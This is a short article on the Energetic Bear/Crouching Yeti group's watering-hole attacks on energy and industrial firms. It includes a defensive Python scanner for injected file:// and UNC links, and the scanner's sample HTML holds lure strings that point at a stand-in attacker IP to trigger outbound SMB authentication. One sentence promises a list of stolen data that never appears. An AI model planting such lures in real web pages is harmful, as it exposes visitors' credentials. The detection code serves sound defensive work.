A well-known APT group called Energetic Bear/Crouching Yeti has attacked the servers of various companies around the world, with a strong focus on the energy and industrial sectors.
This group has been attacking the web servers of various companies around the world using countless malware families since 2010 and has stolen a huge amount of sensitive data.
Mainly during 2016 and in early 2017, the Energetic Bear group compromised several web servers belonging to various organizations.
The main task of these attacks is to search for and identify vulnerabilities in order to gain access to various hosts and steal authentication data.
The attackers use phishing emails carrying malicious documents to compromise various servers, and some of the compromised servers are used for auxiliary purposes, such as hosting tools and logs.
The compromised servers are located in Russia, Ukraine, the UK, Germany, Turkey, the USA and other countries, and play various roles in the attacks.
The attackers use a specific pattern to infect watering-hole servers: they inject a link into a web page or JS file of the form file://IP/filename.png.
The injected link initially appears to request an image, but it eventually makes the user's machine connect to the command-and-control server over SMB, allowing the attackers to extract the following data from the infected systems.
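As an added defensive example (not code from the original article or from any vendor report), the following scanner looks through saved HTML/JS content for the injected link pattern described above, file://IP/filename.png, and also for the equivalent Windows UNC form \\host\share, since both cause a client to fetch the resource over SMB. The sample page fragment and the IP address in it are constructed for the demonstration.

```python
import re
from typing import List, Tuple

# file://<host>/<path> as injected in the watering-hole pages described above.
FILE_URL_RE = re.compile(r"""file://(?:/)?([A-Za-z0-9.\-_]+)/([^\s"'<>)]*)""",
                         re.IGNORECASE)
# Windows UNC form \\<host>\<path>; it triggers the same outbound SMB fetch.
UNC_RE = re.compile(r"""\\\\([A-Za-z0-9.\-_]+)\\([^\s"'<>)]*)""")

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def find_smb_lures(content: str) -> List[Tuple[str, str]]:
    """Return (host, path) for every file:// or UNC reference in an HTML/JS
    body that would make a visitor's browser or OS reach a remote host over
    SMB. References to the local machine are ignored; anything else in web
    content delivered over HTTP(S) is suspicious and worth reviewing."""
    hits: List[Tuple[str, str]] = []
    for pattern in (FILE_URL_RE, UNC_RE):
        for match in pattern.finditer(content):
            host, path = match.group(1), match.group(2)
            if host.lower() not in LOCAL_HOSTS:
                hits.append((host, path))
    return hits


# Constructed sample (not from any real site): one benign image and two
# injected SMB lures of the kind described in the article. 203.0.113.10 is a
# documentation address standing in for an attacker-controlled server.
SAMPLE_HTML = """
<img src="https://example.org/logo.png">
<img src="file://203.0.113.10/filename.png">
<script>var t = new Image(); t.src = "\\\\203.0.113.10\\share\\x.png";</script>
"""

if __name__ == "__main__":
    for host, path in find_smb_lures(SAMPLE_HTML):
        print(f"SMB lure -> host={host} path={path}")
```

Run it over a crawl of your own site's pages and scripts (or over web proxy logs of fetched content) and alert on any hit; a legitimate public web page has no reason to reference a remote file:// or UNC path.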
The attackers use various hacking tools such as nmap, dirsearch, sqlmap, etc. to scan for vulnerable servers, and the compromised servers are then used to conduct attacks on other resources.
The scanned resources hold highly sensitive information such as medical data, cryptocurrency, confidential data including server activities, and financial information.
According to Kaspersky research, most of the tools found on the compromised servers are open-source and publicly available on GitHub.
After they find vulnerable servers, the attackers try to bypass protections and inject exploits to gain further access and pull out log files and other sensitive data from the compromised victims.